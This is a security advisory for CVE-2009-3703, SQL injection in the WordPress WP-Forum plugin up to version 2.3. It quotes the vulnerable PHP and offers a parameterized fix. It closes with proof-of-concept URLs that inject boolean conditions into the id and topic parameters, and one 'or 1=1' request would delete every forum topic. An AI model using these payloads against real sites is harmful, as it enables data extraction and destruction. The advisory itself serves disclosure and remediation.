Seebug SSV:15131
History: Dec 23, 2009 - 12:00 a.m.

WordPress WP-Forum Plugin Multiple SQL Injection Vulnerabilities

2009-12-23 00:00:00 | Root | www.seebug.org

EPSS: 0.001 (Low), Percentile: 28.7%

BUGTRAQ ID: 37357
CVE ID: CVE-2009-3703

WP-Forum is a PHP-based WordPress plugin.

WP-Forum's wpf.class.php does not properly sanitize the user-submitted forum, topic and search_max parameters, nor the id parameter submitted in the editpost or viewtopic actions; a remote attacker can carry out SQL injection by submitting requests with malicious parameters. The vulnerable code segments follow:

In the wpf.class.php file:

// wpf.class.php, lines 1836-1862
$option_max_days = $_POST['search_max']; // <- this line is not being sanitized
$option_forums = $_POST['forum'];
if(!$option_max_days)
    $option_max_days = 9999;
$op .= " AND $this->t_posts.date > SUBDATE(CURDATE(), INTERVAL $option_max_days DAY) ";

foreach((array)$option_forums as $f)
    $a .= $f.","; // <- this line is not being sanitized

$a = substr($a, 0, strlen($a)-1 );
if(!$a)
    $w = "";
else
    $w = "IN($a)";

$sql = "SELECT $this->t_threads.parent_id as pt, $this->t_posts.id, text, $this->t_posts.subject,
    $this->t_posts.parent_id, $this->t_posts.date, MATCH ($what) AGAINST ('$search_string') AS score
    FROM $this->t_posts inner join $this->t_threads on $this->t_posts.parent_id = $this->t_threads.id
    WHERE $this->t_threads.parent_id $w
    AND MATCH (text) AGAINST ('$search_string') $op";

In the wpf-post.php file:

// wpf-post.php, lines 57-62
$id = $_GET['id']; // <- $_GET['id'] is directly assigned
$thread = $this->check_parms($_GET['t']);

$out .= $this->header();

$post = $wpdb->get_row("SELECT * FROM $wpforum->t_posts WHERE id = $id"); // <- id is used without clean up

Other examples:

// wpf.class.php, lines 1490-1510
function remove_post(){
    global $user_level, $user_ID, $wpdb;
    $id = $_GET['id']; // <- $_GET['id'] is directly assigned
    $author = $wpdb->get_var("SELECT author_id from $this->t_posts where id = $id"); // <- id is used without clean up

    // ... (lines 1494-1502 not shown in the advisory)

    if($del == "ok"){
        $wpdb->query("DELETE FROM $this->t_posts WHERE id = $id"); // <- id is used without clean up
        $this->o .= "<div class='updated'>".__("Post deleted", "wpforum")."</div>";
    }
    else
        wp_die(__("Cheating, are we?", "wpforum"));

}

In addition, because $_GET['topic'] is not properly filtered, all records in the $this->t_posts and $this->t_threads tables can be wiped as well:

// wpf.class.php, lines 1479-1489
function remove_topic(){
    global $user_level, $user_ID, $wpdb;
    $topic = $_GET['topic'];
    if($this->is_moderator($user_ID, $this->current_forum)){
        $wpdb->query("DELETE FROM $this->t_posts WHERE parent_id = $topic");
        $wpdb->query("DELETE FROM $this->t_threads WHERE id = $topic");
    }
    else
        wp_die(__("Cheating, are we?", "wpforum"));

}
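As an added example (not the vendor's patch and not code from the plugin itself), the following rewrites the three query sites shown above so that no raw request value is ever concatenated into SQL: integers are bound through %d placeholders and the search string through %s. It relies on the real WordPress APIs $wpdb->prepare(), $wpdb->get_row(), $wpdb->get_var(), $wpdb->query() and absint(); the function names wpf_search_sql_safe, wpf_get_post_safe and wpf_remove_topic_safe, and passing the table names and the $wpdb object as parameters instead of using $this, are assumptions made for the illustration.

```php
<?php
// Added example, not the vendor's fix. Assumes WordPress' $wpdb object
// (prepare/get_row/get_var/query) and absint(); table names are passed in
// where the plugin would use $this->t_posts / $this->t_threads.

// Search handler (wpf.class.php ~1836-1862): build the SQL with placeholders
// and bind every request-derived value.
function wpf_search_sql_safe($wpdb, $t_posts, $t_threads, $what, $search_string) {
    // $what is the MATCH() column list chosen by the plugin, never by the request.

    // search_max must be a positive day count; empty or non-numeric falls back to 9999
    // exactly as the original did.
    $option_max_days = isset($_POST['search_max']) ? absint($_POST['search_max']) : 0;
    if (!$option_max_days) {
        $option_max_days = 9999;
    }

    // forum[] must be a list of integer IDs; anything that is not > 0 is dropped.
    $forums = isset($_POST['forum']) ? (array) $_POST['forum'] : array();
    $forums = array_values(array_filter(array_map('absint', $forums)));

    $where_forum = '';
    if ($forums) {
        // One %d per value: "IN(%d,%d,%d)"; the IDs are bound, not concatenated.
        $placeholders = implode(',', array_fill(0, count($forums), '%d'));
        $where_forum  = "AND $t_threads.parent_id IN($placeholders)";
    }

    $sql = "SELECT $t_threads.parent_id AS pt, $t_posts.id, text, $t_posts.subject,
                   $t_posts.parent_id, $t_posts.date,
                   MATCH ($what) AGAINST (%s) AS score
            FROM $t_posts INNER JOIN $t_threads ON $t_posts.parent_id = $t_threads.id
            WHERE 1=1 $where_forum
              AND MATCH (text) AGAINST (%s)
              AND $t_posts.date > SUBDATE(CURDATE(), INTERVAL %d DAY)";

    // Arguments in placeholder order: search string (twice), forum IDs, day count.
    $args = array_merge(array($search_string, $search_string), $forums, array($option_max_days));
    return $wpdb->prepare($sql, $args);
}

// wpf-post.php line 62 / remove_post(): id is an integer, so bind it with %d.
function wpf_get_post_safe($wpdb, $t_posts, $raw_id) {
    $id = absint($raw_id);
    if (!$id) {
        return null; // 0 or non-numeric input: issue no query at all
    }
    return $wpdb->get_row($wpdb->prepare("SELECT * FROM $t_posts WHERE id = %d", $id));
}

// remove_topic(): same treatment for topic; the caller keeps the moderator check.
function wpf_remove_topic_safe($wpdb, $t_posts, $t_threads, $raw_topic) {
    $topic = absint($raw_topic);
    if (!$topic) {
        return false;
    }
    $wpdb->query($wpdb->prepare("DELETE FROM $t_posts WHERE parent_id = %d", $topic));
    $wpdb->query($wpdb->prepare("DELETE FROM $t_threads WHERE id = %d", $topic));
    return true;
}
```

With %d placeholders an input such as "1 and 1=1" is cast to the integer 1 before it reaches MySQL, the search string is quoted and escaped by prepare() rather than interpolated, and an empty or non-numeric id or topic produces no query at all. The is_moderator() check around remove_topic() remains required: parameterization removes the injection, not the need for authorization.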

Affected: Fredrik Fahlstad WP-Forum <= 2.3

Vendor patch:

Fredrik Fahlstad

The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:

http://www.fahlstad.se/wp-plugins/wp-forum/

PoC:

http://www.example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0
http://www.example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0
http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0
http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1
http://www.example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0
http://www.example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1
http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1